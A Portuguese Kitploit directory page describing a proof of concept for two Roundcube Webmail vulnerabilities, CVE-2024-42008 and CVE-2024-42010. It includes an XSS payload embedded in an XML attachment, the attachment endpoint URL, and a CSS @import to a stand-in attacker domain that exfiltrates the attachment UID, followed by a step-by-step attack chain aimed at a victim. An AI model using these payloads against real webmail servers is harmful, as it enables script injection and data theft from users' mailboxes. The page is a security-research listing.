Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Roundcube-CVE-2024-42008-and-CVE-2024-42010-POC — POC para as vulnerabilidades do Roundcube CVE-2024-42008 e CVE-2024-42010 | Kitploit
Ferramentas/GitHubGitHub/victoni/roundcube-cve-2024-42008-and-cve-2024-42010-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebSegurança de Email
GitHubvictoni/roundcube-cve-2024-42008-and-cve-2024-42010-poc

Roundcube-CVE-2024-42008-and-CVE-2024-42010-POC

POC para as vulnerabilidades do Roundcube CVE-2024-42008 e CVE-2024-42010

Ver Repositório
216há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Prova de Conceito: CVE-2024-42008 e CVE-2024-42010

Esta prova de conceito (PoC) demonstra a exploração de duas vulnerabilidades no Roundcube Webmail que permitem injeção de CSS e scripting entre sites (XSS). O ataque consiste em duas etapas:

  1. XSS por meio de anexo XML malicioso (CVE-2024-42008)

    Devido a verificações insuficientes de upload de arquivos, um arquivo XML pode ser enviado como anexo com código JavaScript, por exemplo:

    <something:script xmlns:something="<http://www.w3.org/1999/xhtml>">
    	alert(origin)
    </something:script>
    

    Esse era um problema conhecido e rastreado como CVE-2020-13965, e a mitigação era desabilitar a opção "Abrir anexo". Mas o arquivo ainda pode ser acessado pelo endpoint

    https://roundcube.host.com/?_task=mail&_mbox=INBOX&_uid=[UID]&_part=2&_download=0&_action=get
    

    Em que UID é o identificador exclusivo para esse anexo específico nessa caixa de correio específica (ou seja, INBOX).

  2. Exfiltração de HTML por meio de injeção de CSS (CVE-2024-42010)

    Ao enviar um e-mail, é possível injetar seu próprio arquivo CSS, quando hospedado em um domínio que começa com a. Por meio disso e de um arquivo de servidor JavaScript que processa as solicitações feitas pelo host Roundcube vulnerável, é possível extrair o UID do anexo XSS malicioso.

    Importe o CSS em um e-mail enviado com

    <style>
    	@import "//a.attackerdomain.com/start?"
    </style>
    

    Hospede o servidor JS (roundcube-css-exploit.js) que exfiltra o UID do anexo malicioso

Cadeia de Ataque

  1. Hospede o servidor JavaScript no seu domínio
  2. Envie um e-mail com um anexo XML malicioso e importe o CSS do seu domínio
  3. A vítima abre o e-mail e o UID é exfiltrado
  4. Então, dependendo da forma preferida de entrega do XSS, você pode enviar um segundo e-mail com o link do anexo ou redirecionar o usuário por meio dele.

Fonte: E-mails Governamentais em Risco: Vulnerabilidade Crítica de Scripting entre Sites no Roundcube Webmail (Equipe de Pesquisa de Vulnerabilidades da Sonar)

Baixar ferramenta